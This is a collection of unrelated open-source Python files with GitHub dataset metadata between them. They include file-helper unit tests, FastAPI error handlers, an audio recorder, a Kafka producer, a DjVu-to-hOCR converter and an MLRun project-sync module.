import unittest import os import shutil from ls import get_dir_files, get_dir_files_count, get_file_contents, get_file_line_count from .stubs import create_temp_file, get_test_file_path, TEST_DIR_PATH, TEST_SUBDIR_PATH class TestFilesHelpers(unittest.TestCase): def setUp(self): os.mkdir(TEST_DIR_PATH) create_temp_file(get_test_file_path('a.md'), 'hello') create_temp_file(get_test_file_path('b.md'), 'world') os.mkdir(TEST_SUBDIR_PATH) create_temp_file(get_test_file_path('c.md', is_subdir=True), 'hello world') def assert_array_equal(self, a, b): for element in a: self.assertIn(element, b) self.assertEqual(len(a), len(b)) def test_non_recursive_get_dir_files(self): files = get_dir_files(TEST_DIR_PATH, recursive=False) files_names = [file.name for file in files] expected_files = ['a.md', 'b.md', 'temp_testsubdir'] self.assert_array_equal(expected_files, files_names) def test_recursive_get_dir_files(self): files = get_dir_files(TEST_DIR_PATH, recursive=True) files_names = [file.name for file in files] expected_files = ['a.md', 'b.md', 'temp_testsubdir', 'c.md'] self.assert_array_equal(expected_files, files_names) def test_get_file_contents(self): paths = [ get_test_file_path('a.md'), get_test_file_path('b.md'), get_test_file_path('c.md', is_subdir=True), ] expected_files_contents = ['hello', 'world', 'hello world'] files_contents = [get_file_contents(path) for path in paths] # Should only be one-lined files for file_contents in files_contents: self.assertTrue(len(file_contents), 1) # Only keep the first line to reuse the helper files_contents = [lines[0] for lines in files_contents] self.assert_array_equal(expected_files_contents, files_contents) def test_get_file_line_count(self): path = get_test_file_path('a.md') file_line_count = get_file_line_count(path) expected_lines_count = 1 self.assertEqual(file_line_count, expected_lines_count) def test_get_dir_files_count(self): folder_files_count = get_dir_files_count(TEST_SUBDIR_PATH) expected_folder_files_count = 1 self.assertEqual(folder_files_count, expected_folder_files_count) def tearDown(self): shutil.rmtree(TEST_DIR_PATH) if __name__ == '__main__': unittest.main()
eveningkid/ls
tests/test_file_helpers.py
test_file_helpers.py
py
2,551
python
en
code
0
github-code
36
72549427943
import traceback from fastapi import HTTPException, Request from fastapi.exceptions import RequestValidationError from starlette.exceptions import HTTPException as StarletteHTTPException from starlette.responses import JSONResponse from tortoise.exceptions import IntegrityError from config import config from utils.patch import MyFastAPI app = MyFastAPI.get_app() class BadRequest(HTTPException): def __init__(self, message: str = 'Bad Request'): super().__init__(400, message) class ValidationError(BadRequest): def __init__(self, message: str = 'Validation Error'): super().__init__(message) class Forbidden(HTTPException): def __init__(self, message: str = 'Forbidden'): super().__init__(403, message) class NotFound(HTTPException): def __init__(self, message: str = 'Not Found'): super().__init__(404, message) @app.exception_handler(IntegrityError) async def integrity_error_handler(request, exception: IntegrityError): raise BadRequest(str(exception)) @app.exception_handler(RequestValidationError) async def validation_error_handler(request: Request, exception: RequestValidationError): message = '' errors = exception.errors() for error in errors: message += f'{".".join(error["loc"])} {error["msg"]}\n' return JSONResponse( content={'message': message.rstrip(), 'detail': errors}, status_code=400 ) @app.exception_handler(StarletteHTTPException) async def http_exception_handler(request, exception: StarletteHTTPException): return JSONResponse( status_code=exception.status_code, content={'message': exception.detail}, ) @app.exception_handler(Exception) async def internal_server_error_handler(request, exception: Exception): return JSONResponse( status_code=500, content={ 'message': str(exception), 'detail': traceback.format_exc().split('\n') if config.debug else '' }, )
OpenTreeHole/treehole_backend
utils/exceptions.py
exceptions.py
py
1,981
python
en
code
0
github-code
36
19544626210
# pip install pipwin # pip install pyaudio import pyaudio import wave from datetime import datetime, timedelta import numpy as np from multiprocessing import shared_memory def runCapture(recDevice, rec_controls_sm, saveFilesPath, SECONDS = 1): rec_controls = rec_controls_sm.buf p = pyaudio.PyAudio() micName = p.get_device_info_by_host_api_device_index(0, recDevice).get('name') RATE = 44100 # 14700/second 44100/ 3secs #SECONDS = 1 # ? multiple of RATE CHUNK = int(RATE * SECONDS) # 44100 # 14700/second 44100/ 3secs ? 44100/30 = 1470 FORMAT = pyaudio.paInt16 FORMATstr = "pyaudio.paInt16" # pyaudio.paInt16 format, the samples are 16-bit integers, so their range is from -32,768 to 32,767. CHANNELS = 1 stream = p.open(format=FORMAT, channels=CHANNELS, rate=RATE, input=True, frames_per_buffer=CHUNK, input_device_index=recDevice) data_chunks = [] # shared script for recording data_stamps = [] waitLoop = True stopStamp = 0.0 while waitLoop: stamp = datetime.timestamp(datetime.now()) # frame reading is embedded in stream.read(CHUNK..... no for loop data_stamps.append(datetime.timestamp(datetime.now())) #data_chunks.append(stream.read(CHUNK, exception_on_overflow=False)) data_chunks.append(stream.read(CHUNK)) # shared script for recording if rec_controls[0] == 0: if stopStamp == -1 and rec_controls[1] != 99: nowTime = datetime.now() stopStamp = datetime.timestamp(nowTime) newSecond = rec_controls[1] - nowTime.second if newSecond < 0: # adjust for wrap around the clock 1 - 58 = -57 newSecond += 60 stopStamp = stopStamp + timedelta(seconds = (newSecond)) elif stamp > stopStamp: waitLoop = False stream.stop_stream() stream.close() p.terminate() wf = wave.open(saveFilesPath + "\\audio_" + str(recDevice) + ".wav", 'wb') wf.setnchannels(1) # CHANNELS wf.setsampwidth(p.get_sample_size(FORMAT))#data_chunks[-1].get_sample_size(FORMAT)) wf.setframerate(RATE) wf.writeframes(b''.join(data_chunks)) wf.close() audFrames = [] for data in data_chunks: #print(len(data)) numpyData = np.frombuffer(data, dtype=np.int16) audFrames.append(numpyData) audFrames = np.array(audFrames, dtype=np.int16) audFrames.tofile(saveFilesPath + "\\audioNpInt16_" + str(recDevice) + ".bin") #audFrames = [] #for data in data_chunks: # print(len(data)) # numpyData = np.frombuffer(data, dtype=np.float) # audFrames.append(numpyData) #audFrames = np.array(audFrames) #audFrames.tofile(saveFilesPath + "\\audioNpFloat_" + str(recDevice) + ".bin") data_raw = np.array(data_chunks) data_raw.tofile(saveFilesPath + "\\audioFramesRaw_" + str(recDevice) + ".bin") #data_chunks = data_chunks.astype(np.int16) #print('audio raw', data_raw.dtype, np.shape(data_raw)) data_stamps = np.array(data_stamps, dtype=float)#, dtype=np.longdouble) #print("audio stampss:", len(data_stamps), data_stamps[0], data_stamps[-1], recDevice, " micName: ", micName) data_stamps.tofile(saveFilesPath+"\\audioStamps_" + str(recDevice) + ".csv", sep = ',') lines = ['RATE:' + str(RATE), 'SECONDS:' + str(SECONDS), 'CHUNK:' + str(CHUNK), "FORMAT:" + FORMATstr]#str(FORMAT)] lines.append('rawType:' + str(data_raw.dtype)) lines.append('rawShape:' + str(np.shape(data_raw))) print('audio', len(data_stamps), lines, micName) with open(saveFilesPath + "\\audioStats_" + str(recDevice) + ".txt", "w") as fhandle: for line in lines: fhandle.write(f'{line}\n') return
Richard-Kershner/Audio-Video-Screen-TimeStamp-Recorder
rec_audio.py
rec_audio.py
py
4,034
python
en
code
0
github-code
36
28630475186
from densefog import web import flask # noqa from icebox.model.iaas import image as image_model def describe_images(): params = web.validate_request({ 'type': 'object', 'properties': { 'limit': { 'type': 'integer', 'minimum': 1, 'maximum': 100, }, 'offset': {'type': 'integer', 'minimum': 0}, 'reverse': {'type': 'boolean'}, 'searchWord': {'type': ['string', 'null']}, 'isPublic': {'type': 'boolean'}, 'status': { 'type': 'array', 'items': { 'type': 'string', 'enum': [ image_model.IMAGE_STATUS_PENDING, image_model.IMAGE_STATUS_ACTIVE, image_model.IMAGE_STATUS_DELETED, image_model.IMAGE_STATUS_CEASED, image_model.IMAGE_STATUS_ERROR, ], }, 'minItems': 0, 'maxItems': 20, 'uniqueItems': True }, 'imageIds': { 'type': 'array', 'items': { 'type': 'string' }, 'minItems': 0, 'maxItems': 20, 'uniqueItems': True } } }) project_id = flask.request.project['id'] image_ids = params.get('imageIds', None) search_word = params.get('searchWord', None) status = params.get('status', None) is_public = params.get('isPublic', False) offset = params.get('offset', 0) limit = params.get('limit', 20) reverse = params.get('reverse', True) page = image_model.limitation( project_ids=[project_id], image_ids=image_ids, is_public=is_public, offset=offset, status=status, limit=limit, search_word=search_word, reverse=reverse) formated = { 'limit': page['limit'], 'offset': page['offset'], 'total': page['total'], 'imageSet': [] } for image in page['items']: formated['imageSet'].append(image.format()) return formated @web.mark_user_operation('image', 'imageIds') def delete_images(): params = web.validate_request({ 'type': 'object', 'properties': { 'imageIds': { 'type': 'array', 'items': { 'type': 'string' }, 'minItems': 0, 'maxItems': 20, 'uniqueItems': True } }, 'required': ['imageIds'] }) project_id = flask.request.project['id'] image_ids = params['imageIds'] image_model.delete(project_id, image_ids) return { 'imageIds': image_ids } @web.mark_user_operation('image', 'imageId') def modify_image_attributes(): params = web.validate_request({ 'type': 'object', 'properties': { 'imageId': {'type': 'string'}, 'name': {'type': 'string', 'maxLength': 50}, 'description': {'type': 'string', 'maxLength': 250} }, 'required': ['imageId'] }) project_id = flask.request.project['id'] image_id = params.get('imageId') name = params.get('name', None) description = params.get('description', None) image_model.modify(project_id, image_id, name=name, description=description) return { 'imageId': image_id }
hashipod/icebox
core/icebox/api/public/image.py
image.py
py
3,641
python
en
code
0
github-code
36
12553211459
import datetime current_weight = 220 goal_weight = 180 average_lbs_week = 1.5 start_date = datetime.date.today() print('Today\'s Date is: {:%B %d, %Y}'.format(start_date)) end_date = start_date # print(end_date) while current_weight > goal_weight: end_date += datetime.timedelta(days=7) current_weight -= average_lbs_week print() print('Date to reach the goal is: {:%B %d, %Y}'.format(end_date)) print() print(f'Reached the goal in {(end_date - start_date).days // 7} weeks')
iampaavan/Pure_Python
Weekly_Goal.py
Weekly_Goal.py
py
506
python
en
code
1
github-code
36
36289747092
from kafka.producer import KafkaProducer TOPIC_NAME = "kafka.client.tutorial" # producer는 생성한 레코드를 전송하기 위해 전송하고자 하는 토픽을 알고 있어야 한다. BOOTSTRAP_SERVER_HOST = "kafka_tutorial:9092" # 전송하고자 하는 카프카 클러스터 서버의 host와 IP를 지정 KEY_SERIALIZER = str.encode VALUE_SERIALIZER = str.encode producer = KafkaProducer( bootstrap_servers=[BOOTSTRAP_SERVER_HOST], key_serializer=KEY_SERIALIZER, value_serializer=VALUE_SERIALIZER ) # test message with key test_message_key = "test" test_message_value = "testMessage for python with Kafka" # key_serializer 함수의 경우 None처리가 필요해보임(Spark udf와 같이) producer.send(topic=TOPIC_NAME, value=test_message_value, key=test_message_key) producer.flush() producer.close()
2h-kim/kafka-personal-study
simple-kafka-producer/kafka-producer-key-value.py
kafka-producer-key-value.py
py
833
python
ko
code
0
github-code
36
2356478535
from __future__ import print_function import argparse import cgi import locale import os import re import sys from .. import cli from .. import hocr from .. import ipc from .. import logger from .. import temporary from .. import text_zones from .. import unicode_support from .. import utils from .. import version from ..hocr import etree from ..text_zones import const from ..text_zones import sexpr __version__ = version.__version__ system_encoding = locale.getpreferredencoding() logger = logger.setup() class ArgumentParser(cli.ArgumentParser): def __init__(self): usage = '%(prog)s [options] FILE' cli.ArgumentParser.__init__(self, usage=usage) self.add_argument('--version', action=version.VersionAction) group = self.add_argument_group(title='input selection options') group.add_argument('path', metavar='FILE', help='DjVu file to covert') def pages(x): return utils.parse_page_numbers(x) group.add_argument('-p', '--pages', dest='pages', action='store', default=None, type=pages, help='pages to convert') group = self.add_argument_group(title='word segmentation options') group.add_argument('--word-segmentation', dest='word_segmentation', choices=('simple', 'uax29'), default='simple', help='word segmentation algorithm') # -l/--language is currently not very useful, as ICU don't have any specialisations for languages ocrodjvu supports: group.add_argument('-l', '--language', dest='language', help=argparse.SUPPRESS or 'language for word segmentation', default='eng') group = self.add_argument_group(title='HTML output options') group.add_argument('--title', dest='title', help='document title', default='DjVu hidden text layer') group.add_argument('--css', metavar='STYLE', dest='css', help='CSS style', default='') def parse_args(self, args=None, namespace=None): options = cli.ArgumentParser.parse_args(self, args, namespace) if options.word_segmentation == 'uax29': options.icu = icu = unicode_support.get_icu() options.locale = icu.Locale(options.language) else: options.icu = None options.locale = None return options class CharacterLevelDetails(Exception): pass class Zone(object): def __init__(self, sexpr, page_height): self._sexpr = sexpr self._page_height = page_height @property def type(self): return const.get_text_zone_type(self._sexpr[0].value) @property def bbox(self): return text_zones.BBox( self._sexpr[1].value, self._page_height - self._sexpr[4].value, self._sexpr[3].value, self._page_height - self._sexpr[2].value, ) @property def text(self): if len(self._sexpr) != 6: raise TypeError('list of {0} (!= 6) elements'.format(len(self._sexpr))) # no coverage if not isinstance(self._sexpr[5], sexpr.StringExpression): raise TypeError('last element is not a string') # no coverage return unicode(self._sexpr[5].value, 'UTF-8', 'replace') @property def children(self): for child in self._sexpr[5:]: if isinstance(child, sexpr.ListExpression): yield Zone(child, self._page_height) else: yield self.text return @property def n_children(self): n = len(self._sexpr) - 5 if n <= 0: raise TypeError('list of {0} (< 6) elements'.format(len(self._sexpr))) # no coverage return n def __repr__(self): return '{tp}({sexpr!r})'.format(tp=type(self).__name__, sexpr=self._sexpr) _xml_string_re = re.compile( u''' ([^\x00-\x08\x0B\x0C\x0E-\x1F]*) ( [\x00-\x08\x0B\x0C\x0E-\x1F]?) ''', re.VERBOSE ) def set_text(element, text): last = None for match in _xml_string_re.finditer(text): if match.group(1): if last is None: element.text = match.group(1) else: last.tail = match.group(1) if match.group(2): last = etree.Element('span') last.set('class', 'djvu_char') last.set('title', '#x{0:02x}'.format(ord(match.group(2)))) last.text = ' ' element.append(last) def break_chars(char_zone_list, options): bbox_list = [] text = [] for char_zone in char_zone_list: bbox = char_zone.bbox char_text = char_zone.text if not char_text: continue for i, char in enumerate(char_text): subbox = text_zones.BBox( int(bbox.x0 + (bbox.x1 - bbox.x0) * 1.0 * i / len(char_text) + 0.5), bbox.y0, int(bbox.x0 + (bbox.x1 - bbox.x0) * 1.0 * (i + 1) / len(char_text) + 0.5), bbox.y1, ) bbox_list += [subbox] text += [char_text] text = str.join('', text) break_iterator = unicode_support.word_break_iterator(text, options.locale) element = None i = 0 for j in break_iterator: subtext = text[i:j] if subtext.isspace(): if element is not None: element.tail = ' ' i = j continue bbox = text_zones.BBox() for k in xrange(i, j): bbox.update(bbox_list[k]) element = etree.Element('span') element.set('class', 'ocrx_word') element.set('title', 'bbox {bbox}; bboxes {bboxes}'.format( bbox=str.join(' ', map(str, bbox)), bboxes=str.join(', ', (str.join(' ', map(str, bbox)) for bbox in bbox_list[i:j])) )) set_text(element, subtext) yield element i = j def break_plain_text(text, bbox, options): break_iterator = unicode_support.word_break_iterator(text, options.locale) i = 0 element = None for j in break_iterator: subtext = text[i:j] if subtext.isspace(): if element is not None: element.tail = ' ' i = j continue subbox = text_zones.BBox( int(bbox.x0 + (bbox.x1 - bbox.x0) * 1.0 * i / len(text) + 0.5), bbox.y0, int(bbox.x0 + (bbox.x1 - bbox.x0) * 1.0 * j / len(text) + 0.5), bbox.y1, ) element = etree.Element('span') element.set('class', 'ocrx_word') element.set('title', 'bbox ' + str.join(' ', map(str, subbox))) set_text(element, subtext) yield element i = j def process_zone(parent, zone, last, options): zone_type = zone.type if zone_type <= const.TEXT_ZONE_LINE and parent is not None: parent.tail = '\n' try: hocr_tag, hocr_class = hocr.djvu_zone_to_hocr(zone_type) except LookupError as ex: if ex[0] == const.TEXT_ZONE_CHARACTER: raise CharacterLevelDetails raise self = etree.Element(hocr_tag) self.set('class', hocr_class) if zone_type == const.TEXT_ZONE_PAGE: bbox = options.page_bbox else: bbox = zone.bbox self.set('title', 'bbox ' + str.join(' ', map(str, bbox))) n_children = zone.n_children character_level_details = False for n, child_zone in enumerate(zone.children): last_child = n == n_children - 1 if isinstance(child_zone, Zone): try: process_zone(self, child_zone, last=last_child, options=options) except CharacterLevelDetails: # Do word segmentation by hand. character_level_details = True break if character_level_details: # Do word segmentation by hand. child = None for child in break_chars(zone.children, options): parent.append(child) if child is not None and zone_type == const.TEXT_ZONE_WORD and not last: child.tail = ' ' self = None elif isinstance(child_zone, unicode): text = child_zone if zone_type >= const.TEXT_ZONE_WORD and options.icu is not None and parent is not None: # Do word segmentation by hand. child = None for child in break_plain_text(text, bbox, options): parent.append(child) if child is not None and zone_type == const.TEXT_ZONE_WORD and not last: child.tail = ' ' self = None else: # Word segmentation as provided by DjVu. # There's no point in doing word segmentation if only line coordinates are provided. set_text(self, text) if zone_type == const.TEXT_ZONE_WORD and not last: self.tail = ' ' if parent is not None and self is not None: parent.append(self) return self def process_page(page_text, options): result = process_zone(None, page_text, last=True, options=options) tree = etree.ElementTree(result) tree.write(sys.stdout, encoding='UTF-8') hocr_header_template = '''\ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="ocr-system" content="{ocr_system}" /> <meta name="ocr-capabilities" content="{ocr_capabilities}" /> <style type="text/css">{css}</style> <title>{title}</title> </head> <body> ''' hocr_header_style_re = re.compile(r'^\s+<style\s.*?\n', re.MULTILINE) hocr_footer = ''' </body> </html> ''' def main(argv=sys.argv): options = ArgumentParser().parse_args(argv[1:]) logger.info('Converting {path}:'.format(path=utils.smart_repr(options.path, system_encoding))) if options.pages is None: djvused = ipc.Subprocess( ['djvused', '-e', 'n', os.path.abspath(options.path)], stdout=ipc.PIPE, ) try: n_pages = int(djvused.stdout.readline()) finally: djvused.wait() options.pages = xrange(1, n_pages + 1) page_iterator = iter(options.pages) sed_script = temporary.file(suffix='.djvused') for n in options.pages: print('select {0}; size; print-txt'.format(n), file=sed_script) sed_script.flush() djvused = ipc.Subprocess( ['djvused', '-f', sed_script.name, os.path.abspath(options.path)], stdout=ipc.PIPE, ) ocr_system = 'djvu2hocr {ver}'.format(ver=__version__) hocr_header = hocr_header_template.format( ocr_system=ocr_system, ocr_capabilities=str.join(' ', hocr.djvu2hocr_capabilities), title=cgi.escape(options.title), css=cgi.escape(options.css), ) if not options.css: hocr_header = re.sub(hocr_header_style_re, '', hocr_header, count=1) sys.stdout.write(hocr_header) for n in page_iterator: try: page_size = [ int(str(sexpr.Expression.from_stream(djvused.stdout).value).split('=')[1]) for i in xrange(2) ] options.page_bbox = text_zones.BBox(0, 0, page_size[0], page_size[1]) page_text = sexpr.Expression.from_stream(djvused.stdout) except sexpr.ExpressionSyntaxError: break logger.info('- Page #{n}'.format(n=n)) page_zone = Zone(page_text, page_size[1]) process_page(page_zone, options) sys.stdout.write(hocr_footer) djvused.wait() # vim:ts=4 sts=4 sw=4 et
jwilk-archive/ocrodjvu
lib/cli/djvu2hocr.py
djvu2hocr.py
py
11,591
python
en
code
41
github-code
36
22354363555
import datetime import traceback import typing import humanfriendly import mergedeep import pytz import sqlalchemy.orm import mlrun.common.schemas import mlrun.config import mlrun.errors import mlrun.utils import mlrun.utils.helpers import mlrun.utils.regex import mlrun.utils.singleton import server.api.crud import server.api.db.session import server.api.utils.auth.verifier import server.api.utils.clients.iguazio import server.api.utils.periodic import server.api.utils.projects.member as project_member import server.api.utils.projects.remotes.leader import server.api.utils.projects.remotes.nop_leader from mlrun.errors import err_to_str from mlrun.utils import logger class Member( project_member.Member, metaclass=mlrun.utils.singleton.AbstractSingleton, ): def initialize(self): logger.info("Initializing projects follower") self._leader_name = mlrun.mlconf.httpdb.projects.leader self._sync_session = None self._leader_client: server.api.utils.projects.remotes.leader.Member if self._leader_name == "iguazio": self._leader_client = server.api.utils.clients.iguazio.Client() if not mlrun.mlconf.httpdb.projects.iguazio_access_key: raise mlrun.errors.MLRunInvalidArgumentError( "Iguazio access key must be configured when the leader is Iguazio" ) self._sync_session = mlrun.mlconf.httpdb.projects.iguazio_access_key elif self._leader_name == "nop": self._leader_client = server.api.utils.projects.remotes.nop_leader.Member() else: raise NotImplementedError("Unsupported project leader") self._periodic_sync_interval_seconds = humanfriendly.parse_timespan( mlrun.mlconf.httpdb.projects.periodic_sync_interval ) self._synced_until_datetime = None # run one sync to start off on the right foot and fill out the cache but don't fail initialization on it try: # Basically the delete operation in our projects mechanism is fully consistent, meaning the leader won't # remove the project from its persistency (the source of truth) until it was successfully removed from all # followers. Therefore, when syncing projects from the leader, we don't need to search for the deletions # that may happen without us knowing about it (therefore full_sync by default is false). When we # introduced the chief/worker mechanism, we needed to change the follower to keep its projects in the DB # instead of in cache. On the switch, since we were using cache and the projects table in the DB was not # maintained, we know we may have projects that shouldn't be there anymore, ideally we would have trigger # the full sync only once on the switch, but since we don't have a good heuristic to identify the switch # we're doing a full_sync on every initialization full_sync = ( mlrun.mlconf.httpdb.clusterization.role == mlrun.common.schemas.ClusterizationRole.chief ) self._sync_projects(full_sync=full_sync) except Exception as exc: logger.warning( "Initial projects sync failed", exc=err_to_str(exc), traceback=traceback.format_exc(), ) self._start_periodic_sync() def shutdown(self): logger.info("Shutting down projects leader") self._stop_periodic_sync() def create_project( self, db_session: sqlalchemy.orm.Session, project: mlrun.common.schemas.Project, projects_role: typing.Optional[mlrun.common.schemas.ProjectsRole] = None, leader_session: typing.Optional[str] = None, wait_for_completion: bool = True, commit_before_get: bool = False, ) -> typing.Tuple[typing.Optional[mlrun.common.schemas.Project], bool]: if self._is_request_from_leader(projects_role): server.api.crud.Projects().create_project(db_session, project) return project, False else: is_running_in_background = self._leader_client.create_project( leader_session, project, wait_for_completion ) created_project = None if not is_running_in_background: # as part of the store_project flow we encountered an error related to the isolation level we use. # We use the default isolation level, I wasn't able to find exactly what is the default that sql alchemy # sets but its serializable(once you SELECT a series of rows in a transaction, you will get the # identical data back each time you re-emit that SELECT) or repeatable read isolation (you’ll see newly # added rows (and no longer see deleted rows), but for rows that you’ve already loaded, you won’t see # any change). Eventually, in the store_project flow, we already queried get_project and at the second # time(below), after the project created, we failed because we got the same result from first query. # Using session.commit ends the current transaction and start a new one which will result in a # new query to the DB. # for further read: https://docs-sqlalchemy.readthedocs.io/ko/latest/faq/sessions.html # https://docs-sqlalchemy.readthedocs.io/ko/latest/dialects/mysql.html#transaction-isolation-level # https://dev.mysql.com/doc/refman/8.0/en/innodb-transaction-isolation-levels.html # TODO: there are multiple isolation level we can choose, READ COMMITTED seems to solve our issue # but will require deeper investigation and more test coverage if commit_before_get: db_session.commit() created_project = self.get_project( db_session, project.metadata.name, leader_session ) return created_project, is_running_in_background def store_project( self, db_session: sqlalchemy.orm.Session, name: str, project: mlrun.common.schemas.Project, projects_role: typing.Optional[mlrun.common.schemas.ProjectsRole] = None, leader_session: typing.Optional[str] = None, wait_for_completion: bool = True, ) -> typing.Tuple[typing.Optional[mlrun.common.schemas.Project], bool]: if self._is_request_from_leader(projects_role): server.api.crud.Projects().store_project(db_session, name, project) return project, False else: try: self.get_project(db_session, name, leader_session) except mlrun.errors.MLRunNotFoundError: return self.create_project( db_session, project, projects_role, leader_session, wait_for_completion, commit_before_get=True, ) else: self._leader_client.update_project(leader_session, name, project) return self.get_project(db_session, name, leader_session), False def patch_project( self, db_session: sqlalchemy.orm.Session, name: str, project: dict, patch_mode: mlrun.common.schemas.PatchMode = mlrun.common.schemas.PatchMode.replace, projects_role: typing.Optional[mlrun.common.schemas.ProjectsRole] = None, leader_session: typing.Optional[str] = None, wait_for_completion: bool = True, ) -> typing.Tuple[typing.Optional[mlrun.common.schemas.Project], bool]: if self._is_request_from_leader(projects_role): # No real scenario for this to be useful currently - in iguazio patch is transformed to store request raise NotImplementedError("Patch operation not supported from leader") else: current_project = self.get_project(db_session, name, leader_session) strategy = patch_mode.to_mergedeep_strategy() current_project_dict = current_project.dict(exclude_unset=True) mergedeep.merge(current_project_dict, project, strategy=strategy) patched_project = mlrun.common.schemas.Project(**current_project_dict) return self.store_project( db_session, name, patched_project, projects_role, leader_session, wait_for_completion, ) def delete_project( self, db_session: sqlalchemy.orm.Session, name: str, deletion_strategy: mlrun.common.schemas.DeletionStrategy = mlrun.common.schemas.DeletionStrategy.default(), projects_role: typing.Optional[mlrun.common.schemas.ProjectsRole] = None, auth_info: mlrun.common.schemas.AuthInfo = mlrun.common.schemas.AuthInfo(), wait_for_completion: bool = True, ) -> bool: if self._is_request_from_leader(projects_role): server.api.crud.Projects().delete_project( db_session, name, deletion_strategy ) else: return self._leader_client.delete_project( auth_info.session, name, deletion_strategy, wait_for_completion, ) return False def get_project( self, db_session: sqlalchemy.orm.Session, name: str, leader_session: typing.Optional[str] = None, ) -> mlrun.common.schemas.Project: return server.api.crud.Projects().get_project(db_session, name) def get_project_owner( self, db_session: sqlalchemy.orm.Session, name: str, ) -> mlrun.common.schemas.ProjectOwner: return self._leader_client.get_project_owner(self._sync_session, name) def list_projects( self, db_session: sqlalchemy.orm.Session, owner: str = None, format_: mlrun.common.schemas.ProjectsFormat = mlrun.common.schemas.ProjectsFormat.full, labels: typing.List[str] = None, state: mlrun.common.schemas.ProjectState = None, # needed only for external usage when requesting leader format projects_role: typing.Optional[mlrun.common.schemas.ProjectsRole] = None, leader_session: typing.Optional[str] = None, names: typing.Optional[typing.List[str]] = None, ) -> mlrun.common.schemas.ProjectsOutput: if ( format_ == mlrun.common.schemas.ProjectsFormat.leader and not self._is_request_from_leader(projects_role) ): raise mlrun.errors.MLRunAccessDeniedError( "Leader format is allowed only to the leader" ) projects_output = server.api.crud.Projects().list_projects( db_session, owner, format_, labels, state, names ) if format_ == mlrun.common.schemas.ProjectsFormat.leader: leader_projects = [ self._leader_client.format_as_leader_project(project) for project in projects_output.projects ] projects_output.projects = leader_projects return projects_output async def list_project_summaries( self, db_session: sqlalchemy.orm.Session, owner: str = None, labels: typing.List[str] = None, state: mlrun.common.schemas.ProjectState = None, projects_role: typing.Optional[mlrun.common.schemas.ProjectsRole] = None, leader_session: typing.Optional[str] = None, names: typing.Optional[typing.List[str]] = None, ) -> mlrun.common.schemas.ProjectSummariesOutput: return await server.api.crud.Projects().list_project_summaries( db_session, owner, labels, state, names ) async def get_project_summary( self, db_session: sqlalchemy.orm.Session, name: str, leader_session: typing.Optional[str] = None, ) -> mlrun.common.schemas.ProjectSummary: return await server.api.crud.Projects().get_project_summary(db_session, name) def _start_periodic_sync(self): # the > 0 condition is to allow ourselves to disable the sync from configuration if self._periodic_sync_interval_seconds > 0: logger.info( "Starting periodic projects sync", interval=self._periodic_sync_interval_seconds, ) server.api.utils.periodic.run_function_periodically( self._periodic_sync_interval_seconds, self._sync_projects.__name__, False, self._sync_projects, ) def _stop_periodic_sync(self): server.api.utils.periodic.cancel_periodic_function(self._sync_projects.__name__) def _sync_projects(self, full_sync=False): """ :param full_sync: when set to true, in addition to syncing project creation/updates from the leader, we will also sync deletions that may occur without updating us the follower """ db_session = server.api.db.session.create_session() try: leader_projects, latest_updated_at = self._list_projects_from_leader() db_projects = server.api.crud.Projects().list_projects(db_session) self._store_projects_from_leader(db_session, db_projects, leader_projects) if full_sync: self._archive_projects_missing_from_leader( db_session, db_projects, leader_projects ) self._update_latest_synced_datetime(latest_updated_at) finally: server.api.db.session.close_session(db_session) def _list_projects_from_leader(self): try: leader_projects, latest_updated_at = self._leader_client.list_projects( self._sync_session, self._synced_until_datetime ) except Exception: # if we failed to get projects from the leader, we'll try get all the # projects without the updated_at filter leader_projects, latest_updated_at = self._leader_client.list_projects( self._sync_session ) return leader_projects, latest_updated_at def _store_projects_from_leader(self, db_session, db_projects, leader_projects): db_projects_names = [project.metadata.name for project in db_projects.projects] # Don't add projects in non-terminal state if they didn't exist before to prevent race conditions filtered_projects = [] for leader_project in leader_projects: if ( leader_project.status.state not in mlrun.common.schemas.ProjectState.terminal_states() and leader_project.metadata.name not in db_projects_names ): continue filtered_projects.append(leader_project) for project in filtered_projects: # if a project was previously archived, it's state will be overriden by the leader # and returned to normal here. server.api.crud.Projects().store_project( db_session, project.metadata.name, project ) def _archive_projects_missing_from_leader( self, db_session, db_projects, leader_projects ): logger.info("Performing full sync") leader_project_names = [project.metadata.name for project in leader_projects] projects_to_archive = { project.metadata.name: project for project in db_projects.projects } for project_name in leader_project_names: if project_name in projects_to_archive: del projects_to_archive[project_name] for project_to_archive in projects_to_archive: logger.info( "Found project in the DB that is not in leader. Archiving...", name=project_to_archive, ) try: projects_to_archive[ project_to_archive ].status.state = mlrun.common.schemas.ProjectState.archived server.api.crud.Projects().patch_project( db_session, project_to_archive, projects_to_archive[project_to_archive].dict(), ) except Exception as exc: logger.warning( "Failed to archive project from DB, continuing...", name=project_to_archive, exc=err_to_str(exc), ) def _update_latest_synced_datetime(self, latest_updated_at): if latest_updated_at: # sanity and defensive programming - if the leader returned a latest_updated_at that is older # than the epoch, we'll set it to the epoch epoch = pytz.UTC.localize(datetime.datetime.utcfromtimestamp(0)) if latest_updated_at < epoch: latest_updated_at = epoch self._synced_until_datetime = latest_updated_at def _is_request_from_leader( self, projects_role: typing.Optional[mlrun.common.schemas.ProjectsRole] ) -> bool: if projects_role and projects_role.value == self._leader_name: return True return False @staticmethod def _is_project_matching_labels( labels: typing.List[str], project: mlrun.common.schemas.Project ): if not project.metadata.labels: return False for label in labels: if "=" in label: name, value = [v.strip() for v in label.split("=", 1)] if name not in project.metadata.labels: return False return value == project.metadata.labels[name] else: return label in project.metadata.labels
mlrun/mlrun
server/api/utils/projects/follower.py
follower.py
py
18,072
python
en
code
1,129
github-code
36
5462088920
